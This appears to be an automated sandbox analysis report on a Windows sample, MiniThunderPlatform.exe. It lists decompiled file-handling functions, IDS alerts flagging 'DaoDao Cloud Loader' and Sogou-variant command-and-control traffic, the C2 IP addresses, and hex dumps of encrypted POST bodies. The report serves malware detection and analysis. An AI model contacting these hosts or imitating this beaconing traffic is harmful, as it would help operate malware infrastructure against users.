Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_00417AD2 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,swprintf,swprintf,FindFirstFileW,_wcsicmp,_wcsicmp,_wcsicmp,swprintf,RemoveDirectoryW,_wcsicmp,swprintf,swprintf,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,15_2_00417AD2
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_00434B30 GetModuleHandleW,GetModuleFileNameW,??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,wcscat,FindFirstFileW,??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??0?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@H@Z,GetCommandLineW,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV01@K@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,FindNextFileW,FindClose,?str@?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBE?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@2@XZ,??_D?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEXXZ,15_2_00434B30
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_00432D00 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ,?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??A?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEAB_WI@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,FindFirstFileW,_wcsicmp,_wcsicmp,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,CopyFileW,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,FindNextFileW,FindClose,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,15_2_00432D00
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_00417E47 FindFirstFileW,15_2_00417E47
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_0043DCBA FindFirstFileW,FindClose,15_2_0043DCBA
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_00418630 GetFileAttributesExW,FindFirstFileW,FindClose,CreateFileW,GetFileSizeEx,CloseHandle,15_2_00418630
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_004184A0 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@_W@Z,??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z,FindFirstFileW,FindNextFileW,FindClose,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,15_2_004184A0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_1005CBA0 ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindFirstFileA,GetLastError,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??3@YAXPAX@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,15_2_1005CBA0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_100272A0 FindFirstFileA,FindClose,15_2_100272A0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_10027330 FindFirstFileA,FindClose,15_2_10027330
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_10071280 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindFirstFileA,FindFirstFileA,FindClose,?npos@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@2IB,?find_last_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,FindFirstFileA,FindNextFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,RemoveDirectoryA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,15_2_10071280

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2051639 - Severity 1 - ET MALWARE DaoDao Cloud Loader C2 Response : 120.27.243.153:32520 -> 192.168.2.10:49776
Source: Network trafficSuricata IDS: 2851825 - Severity 1 - ETPRO MALWARE Win32/Sogou.H Variant CnC Activity : 192.168.2.10:57267 -> 140.206.225.136:80
Source: Network trafficSuricata IDS: 2051639 - Severity 1 - ET MALWARE DaoDao Cloud Loader C2 Response : 120.27.243.153:32520 -> 192.168.2.10:57360
Source: Network trafficSuricata IDS: 2051639 - Severity 1 - ET MALWARE DaoDao Cloud Loader C2 Response : 120.27.243.153:32520 -> 192.168.2.10:57358
Source: Network trafficSuricata IDS: 2051639 - Severity 1 - ET MALWARE DaoDao Cloud Loader C2 Response : 120.27.243.153:32520 -> 192.168.2.10:57359
Source: global trafficTCP traffic: 192.168.2.10:49776 -> 120.27.243.153:32520
Source: global trafficUDP traffic: 192.168.2.10:9027 -> 47.92.202.235:8000
Source: global trafficUDP traffic: 192.168.2.10:9027 -> 111.206.4.176:8000
Source: global trafficUDP traffic: 192.168.2.10:9027 -> 47.102.130.81:8000
Source: global trafficTCP traffic: 192.168.2.10:57222 -> 1.1.1.1:53
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 140.206.225.136:80Content-type: application/octet-streamContent-Length: 204Connection: Keep-AliveData Raw: 3c 00 00 00 07 00 00 00 c0 00 00 00 99 88 68 20 9c 43 74 48 97 50 1d f1 2d d5 f4 78 3c 1e b2 2a 11 00 81 15 c0 ec 9d c4 84 c7 f2 5d 2e c5 17 44 1b af a5 d7 4f df 9a e6 1b 81 13 66 8b 8b c3 20 62 d2 f7 f8 9d b7 f4 f7 e7 7d d8 e4 3b 37 fc 98 57 e3 8b 6d f8 a7 fb 4b 6f 91 dd ac 00 83 d3 b9 9b 34 05 24 ce f0 d5 2a 14 7c 75 74 16 82 5a 18 22 c3 3b bb 8f a5 5d 35 26 92 05 6f 6e 84 b6 38 53 ef d3 aa 23 66 e9 6d b6 09 35 42 c5 58 de 33 86 9c 0e 9a 31 65 ed c5 9b a9 44 4d ba 23 91 9d 94 e9 02 81 9b ca d6 9b f0 db 65 31 02 8d 83 9c b4 20 e3 ec d5 c7 c6 be 75 9d d1 85 57 27 00 7d b4 42 21 81 fb f5 dd d5 52 93 a2 61 Data Ascii: <h CtHP-x<*].DOf b};7WmKo4$*|utZ";]5&on8S#fm5BX31eDM#e1 uW'}B!Ra
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 112.64.218.154:80Content-type: application/octet-streamContent-Length: 252Connection: Keep-AliveData Raw: 3d 00 00 00 01 00 00 00 f0 00 00 00 e8 77 c7 8b 4a 2e 9d c0 e6 9f 60 9d 1a 49 b4 ea 99 de eb fb ac 60 4f ba d0 1a e1 3d 44 c5 0f 22 e8 53 5f 6f 59 e3 a8 03 2e f3 4e 36 27 e0 af fd 5b 86 33 00 92 ee d9 2a 21 4c 98 40 60 df 80 9b 04 69 a7 fe 77 e0 5c 89 8b 51 78 a6 58 6a 9d 85 00 3a 3f 45 62 52 6e 70 68 bb fa 16 76 26 db c8 84 6b 09 63 2f 91 12 1e ce 53 d6 88 ce 77 b1 a8 de f9 35 dc 8a c3 47 b4 10 55 bd b9 19 cf 35 ba a6 a9 c1 4b 4c ef d4 3f a4 78 8a 6f 9b 6e 58 bf a3 69 d6 ab fb dd 3d f4 33 0b 39 45 58 2a b6 9f 79 5b 53 fc dc 04 0d 6b 8f 83 ae d5 05 92 19 55 88 1b bd 10 9d 8f 6b 05 e3 98 6a ef 10 4f 52 74 40 0c cb 58 61 97 82 a8 bb a4 df b1 0b ed ac 71 a0 3e ff d6 6a 6b 95 54 9e d7 05 47 28 85 c5 9c 35 81 44 39 be bd 67 19 59 be 0c f8 5f fb 00 7c Data Ascii: =wJ.`I`O=D"S_oY.N6'[3*!L@`iw\QxXj:?EbRnphv&kc/Sw5GU5KL?xonXi=39EX*y[SkUkjORt@Xaq>jkTG(5D9gY_|
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 116.132.218.191:80Content-type: application/octet-streamContent-Length: 188Connection: Keep-AliveData Raw: 3c 00 00 00 05 00 00 00 b0 00 00 00 ae 7e 19 39 88 19 74 b9 b6 fc 4a 85 c2 48 da 14 80 eb 26 26 69 25 1a b4 5e 48 fd d6 f3 6c a3 bc 15 fa e0 f7 8d 56 17 9d 1a 1c 17 18 cb 11 c1 77 59 85 57 48 3e 09 11 0d 9a 12 fc 9d 14 78 24 75 01 c6 94 98 43 37 2e 67 83 c3 86 cc 7a 87 75 94 68 1c 00 48 da 81 80 22 75 a0 53 da bc eb a2 03 bb d9 a2 35 ba 13 37 55 a4 e8 bd e5 36 46 d0 09 6a 01 c2 c2 ae 5b 47 ed 4d f5 9a 3c a7 54 a4 21 47 fb d4 82 88 d5 2f e9 a3 92 28 e9 84 0d 42 66 e1 e1 c8 6f 22 35 ea 48 f0 9a cb f5 29 12 f1 10 45 22 8e 29 8d bc 83 df aa 9c a2 4a 40 b0 fe 7e Data Ascii: <~9tJH&&i%^HlVwYWH>x$uC7.gzuhH"uS57U6Fj[GM<T!G/(Bfo"5H)E")J@~
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 112.64.218.154:80Content-type: application/octet-streamContent-Length: 124Connection: Keep-AliveData Raw: 3d 00 00 00 0f 00 00 00 70 00 00 00 72 77 0c 6c df 35 a2 47 3f 82 70 bd 80 00 82 29 e6 fc 19 08 5a 4a 4d 1c cd 3a 01 fc f9 f6 44 c7 d0 4f 95 8c be de fa 6e b7 b8 e6 e1 3c d7 35 df 10 97 c7 41 92 98 f7 6c 22 7e 49 ef 15 33 86 15 dc ec 89 fc b0 4d ab f2 8a f0 06 f9 c7 ae ee 8e 25 bb 32 cb 2e 8d d7 cd 12 f5 4f 1c 63 b9 48 60 fe aa bf a6 93 9d 04 22 c0 d0 01 ee 8b 5e b9 25 Data Ascii: =prwl5G?p)ZJM:DOn<5Al"~I3M%2.OcH`"^%
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 116.132.218.191:80Content-type: application/octet-streamContent-Length: 1388Connection: Keep-AliveData Raw: 3c 00 00 00 11 00 00 00 60 05 00 00 bb c6 5d 98 b0 2f 57 e0 92 98 ac dd 0e 9a d2 5e c1 81 54 d0 30 51 33 7c 34 60 66 c4 a2 54 6f e1 0e 41 9b e1 ee a3 03 a7 13 82 01 59 b4 e9 26 05 9d 4c f2 a5 3f a6 47 33 f0 24 97 c6 90 e1 87 5f 57 01 ab af 83 e7 c0 95 04 2f da 2a dc a6 c2 b1 1a 40 25 c7 ff af 8a 26 2f da f1 83 4f db 5d 82 6c 70 2e 2e cb 1a b3 06 d4 a6 c3 24 df 4d 06 23 ae 43 88 2a f8 56 55 ae 98 d1 44 4c 8c bb fd b1 13 d9 3d cb 04 ef 96 2c 57 aa ad 7b 14 9c da cd 6f 6a bb 0d 78 ae ec e2 7c be c7 d8 5f 21 c8 9e 6c 08 8d b2 6e 8c a5 f6 54 54 c9 45 96 d8 27 82 a8 fa c0 43 99 bc 3f c2 86 ea 30 9b 86 8f 8a 10 05 13 06 2a ce 7d d7 d0 2e d2 69 ba c6 01 ee 3b b5 92 92 ff 20 14 c0 76 09 71 35 8f 8d 87 1b 47 e1 ed bb 39 44 a2 65 e6 5e 5b 9c 95 e6 17 78 dc fa 13 57 23 b6 17 d2 96 0e 8a 2c ec 9f 4d f2 f9 98 6b 3e 33 bf 16 ab 01 e3 a3 27 ba 6c 0d 7a 06 8e 57 af 00 41 49 c5 e7 34 87 2e f0 df ed a5 a6 3f f6 e5 24 ba 4b 47 fe d6 0c cc f0 3f df 9b 82 80 1f d6 e7 6f 10 2f 4c 9c 5d be 31 19 c4 ae c2 1a c0 6f 20 65 04 81 a7 aa af b8 dd d2 be 6c 2f 93 35 9b d6 2b da 5d 3f 8f fa 20 7d 4c 07 e4 04 e5 15 09 3e 98 03 d4 eb 9a d9 78 5b f8 1d 58 ca 14 cf 2f a7 e3 4d b5 2f 32 8e 82 18 5f f4 ae a3 b7 04 69 55 85 5a 80 29 ae 43 94 21 3b c7 49 40 bc 93 bc 63 a1 5d 21 6d 38 6c 4c b1 08 c5 2b 83 e0 35 8b f3 04 04 c3 e9 77 74 27 52 34 31 62 72 94 17 81 6f ee b1 bd 9d bd 19 18 1e 89 3e 34 21 2c de 97 0f db fa 4e 50 7e eb 10 ea 2e ef 8e b8 b0 e8 97 58 24 32 44 69 96 24 41 34 57 40 6d 2b 9f 32 7e 15 0f 25 24 2c 48 05 c6 f2 8e 4a da 73 15 bb 13 02 13 be 56 a1 e5 e3 11 d9 7e 88 e7 05 a9 85 e6 e3 18 96 b8 30 fb cf 59 67 7c 3c 24 df 2d 57 c5 c7 6a ad be eb a3 88 5c 52 ea 91 15 0b 60 07 e8 de 89 4d 41 c7 6e 91 8d 33 23 d2 77 59 f4 d1 d3 46 11 f7 f7 c3 8d 16 6d c8 fd 62 24 8d a6 c5 27 b7 db 9e 4c 2c c6 4b 6e 35 2a 7f 3f 64 32 df 77 79 7e 64 d5 ba b8 52 a4 49 e8 b5 24 33 06 2a 51 d4 15 d1 89 e6 d4 52 11 61 de e2 c4 d5 32 11 3e 56 bb 95 b4 aa 1e 4d d1 b3 43 d8 a7 bc 81 d0 a4 e8 19 26 0d e1 da e8 25 50 ca 48 df 18 ae 4e e9 aa 77 ec 19 a4 21 f7 6b a1 72 1d 82 a8 60 2e 88 7e 85 17 d4 6a 9e 01 b3 d8 68 17 6c 70 5c aa af 58 a1 db 41 3b 99 b4 39 6f 46 0b d2 fb df c7 77 e0 70 35 8f 05 ab 73 b4 1e 6d 41 da 3a c0 e0 da 2f 2d cb 29 11 d3 e6 81 16 6e 76 20 74 2e 5e a2 96 b3 e0 2e b6 70 08 f2 c2 4b fa f2 22 24 da fe e8 aa 15 09 55 83 fb 9b 47 4e fb 4a 22 c3 53 24 ab 54 2d d8 53 7c 0a 6b ec 67 1d 2b 48 32 c3 2d 34 da 7a 55 cc 40 73 e9 a4 2b 6b a1 58 46 be 5d 90 87 45 df 0a 12 a4 ef 4d 9c d8 72 4c 1a c0 b0 b6 9e 43 0b 91 86 67 87 fd 54 c6 56 63 93 8e c9 82 c7 7a f6 cd 47 b2 79 d8 1d 37 25 15 f5 f0 e5 80 bc e0 1f 26 ae 09 f1 a7 7a c8 0b 3f 57 c2 41 ff f7 ea f4 9c 7a 8a a3 97 8d b2 34 f2 cd b0 0e f7 f1 00 4f 2d 67 90 b4 40 c9 3b f3 3c 3e 71 15 44 79 ee f7 d9 72 c5 4f f6 7b e4 c1 e4 d8 fb ea 80 28 d9 37 d6 76 f0 e3 4b dd 1b b7 13 aa f8 ce 22 a8 d6 b1 5d 1f a4 98 14 3a 8b
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 116.132.219.22:80Content-type: application/octet-streamContent-Length: 44Connection: Keep-AliveData Raw: 41 00 00 00 09 00 00 00 20 00 00 00 5d af 3f 1b 47 de be fb 0e e3 c6 e2 e6 84 df 49 23 0a 9e f3 ce 65 b5 76 24 35 0c 0a a6 d4 fe c6 Data Ascii: A ]?GI#ev$5
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 140.206.225.136:80Content-type: application/octet-streamContent-Length: 1484Connection: Keep-AliveData Raw: 3c 00 00 00 13 00 00 00 c0 05 00 00 25 5f 85 3a 4f 3e b6 87 5d ee 3a 64 1a 17 d6 74 8c ac 06 18 42 bd 0b c3 dc c7 09 71 16 d5 e1 31 45 fc 97 f0 79 ff bb 24 a9 4b e0 d5 f2 64 d8 c6 c7 1b 5b 11 4e 09 61 03 88 7c a6 4e 3d 56 d9 34 66 29 42 03 77 9e 70 1b a9 44 c3 63 d2 b8 0a 50 95 b4 90 1c 7e 97 b9 18 7a b5 5f 05 9f 54 f2 2b e9 e1 10 18 79 28 58 77 5d 68 a6 be a9 19 cc 4c 4b e5 13 20 67 fa 70 2f a3 8d 6b 8d 3b d4 7a d0 84 5c 62 3e 3a e8 d1 e9 08 0c 96 63 b8 56 f9 35 91 93 1d 98 b8 78 62 de a7 86 5e cc 2e cb 6e 31 b7 4a e8 b0 d5 63 75 72 2c 5e 27 9c 88 1a c6 53 64 47 14 d8 82 5a 44 a0 b7 1f 80 fd 1c 65 91 c7 9f 3a 11 d7 db 8b c8 c6 a0 76 bb a8 f6 d8 9c 98 46 e4 44 03 84 c9 0e a5 b2 c0 dc 12 3e ad e1 6e 90 a1 7a 57 c3 78 98 8d 71 b6 63 24 2b 3a 07 f6 a9 fb 9d e7 c9 f9 d4 25 99 6e 1b af b3 c1 83 b5 77 d7 70 f3 33 45 3d cc 39 fb 39 5f 90 80 d3 70 e2 fc 39 9d 6f 8b 97 69 93 4e fb cc dc fc b7 32 fe a0 ca ae db f4 93 68 aa 2f 64 aa 9b bb ae 72 c2 ff 95 f2 9e 01 c5 6d 54 81 1e 32 40 5b 84 96 df 00 3b 48 95 80 ef 61 58 f4 01 87 34 60 e1 d9 fb e7 a4 47 f0 61 3b e5 b9 b7 92 ab f3 d7 69 17 28 cf 1c 81 29 30 3e 88 57 f3 aa 50 23 df 33 64 0a b4 41 d5 91 09 37 26 40 48 6f 75 97 02 a6 f6 9e 1d c8 f4 35 a1 42 de f4 dc 18 cf 64 c1 81 46 3f e5 5b e0 f5 1f 28 f6 f0 cd d1 d4 74 a8 2e f5 42 9b ec c1 b3 83 d2 eb cb 24 9c 77 b8 2a cf 81 ac b0 81 46 07 63 48 82 1a 7f 4d c4 22 f0 43 9f f0 c8 69 7c 80 d0 27 c3 06 af fe 73 e2 c8 bb 72 41 b2 86 6f b3 36 5f b9 7f 22 8d 39 c0 51 4b c9 2b 3b 73 68 c4 d8 1a 51 ce 27 2c 78 d6 8b 58 28 f9 16 2c 8f 9a 41 b9 26 0f 9e 10 8a 4c 6f 05 56 a4 6a f4 e1 64 d4 7a 40 d3 ac d1 59 23 7d 78 b3 d7 9d e0 50 de 4f 08 f9 e6 ba 4f 01 90 c6 76 81 5e 42 f9 59 9b 97 17 6f 58 42 e6 d0 a6 8a 64 85 ce 77 c2 36 ce 6b 02 80 b7 c4 30 f4 24 c3 36 6f 2b 87 90 ed cf e7 58 56 98 dd 1e a0 1e 99 62 65 e2 ab b7 11 14 10 ac 3c 2a 45 50 c1 fe 40 5b 6d ba 02 68 88 77 69 ca 53 ab 40 91 a0 dc 18 94 d7 50 fb a7 e6 c7 41 15 5e 46 9c 96 c4 60 54 a1 14 5d 77 eb d2 8d 67 6d 6f f5 ff e2 01 70 7a 75 f7 df df cc dd aa 80 93 9b 0a 52 ed 3f 96 23 bc a0 8f 7d 8e cb 97 9d d8 46 61 35 13 37 f9 df 27 e1 e0 f7 ce a2 c5 b8 ae 57 e5 3c b4 0a 6e a4 99 6c 30 6a 44 05 b4 d8 21 35 c8 36 d7 b7 a3 08 6a e0 44 e3 61 82 8e c9 ca 3b b6 e5 1e 79 9c d1 93 f2 1f 83 b5 b1 f3 1b 7c 7a e1 a3 c5 64 a3 bd 64 99 52 ba 8e 59 1f 19 12 50 f3 44 bf 91 8a 8c 13 e8 29 87 37 30 de c5 b6 9b e0 42 57 01 32 82 3d f7 9b 80 41 80 ab 5a 67 97 f4 54 4a 10 67 ec e8 8d e4 aa a8 8f 06 62 b9 56 fd d8 d0 e5 dc 49 64 0b 7a 13 f0 f2 a0 4f 34 f9 d8 f0 92 7e 80 f9 ef 10 ce e5 35 e1 77 f5 61 e2 ef 13 07 7d 26 b3 f1 64 a6 99 85 a0 19 34 62 7c 9c 0e e2 5e 2f 4c c1 b5 43 18 94 d6 cd fe 1e 86 0f 1b 60 f1 4e 64 8a 6d 03 ae 72 a2 68 34 ff db 54 34 9b 3f 41 79 fc c1 35 59 c1 93 7d a6 3c 9a 2f cd ce d2 a8 e5 73 9d fc 56 8a de f0 fd ff 0f 0c 16 35 0f ee 92 c8 ec 54 e3 31 53 66 d6 da cd 6c 53 8f 36 8c 26
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 140.206.225.136:80Content-type: application/octet-streamContent-Length: 368Connection: Keep-AliveData Raw: 88 58 03 26 20 4e 00 00 80 00 00 00 6f 21 a8 60 85 32 73 1e 4a 11 cf 48 7d 59 02 3d dd e3 7c 95 ba 6e 51 c8 5e df b3 14 ac 79 b0 04 64 36 b1 1f 70 6b a8 a4 87 fa 0a bb ea 05 76 ac 6e 59 5a 74 3f ec aa fe 17 59 67 be c0 80 01 94 63 85 b2 41 1a f9 44 5b a4 f9 92 59 d7 0c 47 2a fd a0 0d 58 b2 33 fa 93 c9 b7 24 1c 87 62 dd 6e 30 fa 2e b8 46 95 d5 f1 f4 81 82 71 0e 53 27 a1 d1 0a 01 ff 28 59 45 7e 89 03 99 63 22 78 34 a3 e0 00 00 00 9e f5 8f 05 e2 39 8b 18 8e 1a 67 84 a8 27 6c 82 36 ae 42 72 35 01 11 e0 87 db 31 2b b5 1d d4 8c e1 c9 0b d3 e6 57 6c 17 4d 60 8c 5e 5a 66 7a b5 e5 71 6c 99 43 6f 94 29 a3 04 62 62 48 8f d0 73 40 ae d0 41 e8 a2 d3 41 04 fe ec ee b5 d3 f4 a6 f6 e0 4c 8e a9 c1 1a 03 7a 7c d8 46 30 c2 1d 06 e5 16 db 29 17 24 10 45 9f 34 3f c8 3d 86 c3 37 20 9e 70 6f 3c 05 52 6e e5 07 66 17 99 d8 7e 3b fc f2 89 0a 6e 78 e7 96 14 8a 6d cc 5f 2f 39 89 e9 95 67 1d 6c 1f 83 d7 95 4b a2 7b 6f 4d 8f 84 82 79 88 53 84 d2 54 04 b8 55 39 46 eb 1e 77 74 07 91 2d 6b ff ee bf 72 25 66 d6 aa 7a bc 0d d3 00 27 47 3b 19 6e 37 39 5f f0 2e 65 63 11 81 fa b8 bc 39 5f c2 cc 61 0c 8e 02 41 d5 b3 ef cd 6e Data Ascii: X& No!`2sJH}Y=|nQ^yd6pkvnYZt?YgcAD[YG*X3$bn0.FqS'(YE~c"x49g'l6Br51+WlM`^ZfzqlCo)bbHs@AALz|F0)$E4?=7 po<Rnf~;nxm_/9glK{oMySTU9Fwt-kr%fz'G;n79_.ec9_aAn
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 116.132.218.191:80Content-type: application/octet-streamContent-Length: 352Connection: Keep-AliveData Raw: 88 58 03 26 10 27 00 00 80 00 00 00 80 64 46 4a a0 ef b0 5b 42 16 67 ec 89 14 7d 20 c7 43 ff 93 72 2a 75 9e f5 cd dd af 97 2f 46 21 c9 a4 a7 55 77 a2 29 02 0f 06 56 ba 7e 77 15 82 71 cf f4 b6 8e eb 24 1c 5d 43 e6 9c 0c 33 0e 87 25 d1 e3 f1 d4 d0 71 ed c8 52 54 a2 36 d0 d7 27 80 bd 1b ce 91 a8 c0 93 18 e8 ff ee 08 1c 57 af 7e 47 ca ea fd 5e dd 0f af 09 c7 36 e3 62 bb 82 c3 71 97 75 90 73 57 c5 7b ef b9 cc f0 a6 81 a1 d0 00 00 00 1d 6a 8d 6c 65 53 b7 c3 c7 4c 86 ab 6d 7e 3a 01 00 06 5e ec 83 cb b0 b7 55 2d 07 90 1e 84 27 f2 fc 11 9e 23 c6 89 59 13 9a fa 61 29 3a 17 5f 8f de f9 0a c3 fa ab 71 0b 94 40 95 5a 8c ce 54 d9 48 b4 cf 5d 28 53 4c e8 74 aa 3e 7f ab 71 be dc e1 c3 1c 54 12 47 cc ae cf 2e cf 25 0c 56 20 7d 00 a2 47 83 ec 89 0f 24 2b ee 07 b9 1f 63 82 38 95 36 e2 8b 90 ea c1 e5 a0 b7 79 1d ec cf 2e cc 12 ba c2 ce be 9f fd a1 b8 f7 a0 d6 f4 46 e2 e5 bc 1f f7 7c 32 c3 5e 6a cf 1c 12 12 69 38 62 37 c3 20 97 62 f7 28 c2 76 f6 6f 5d d1 6e 95 3c 40 80 4f 02 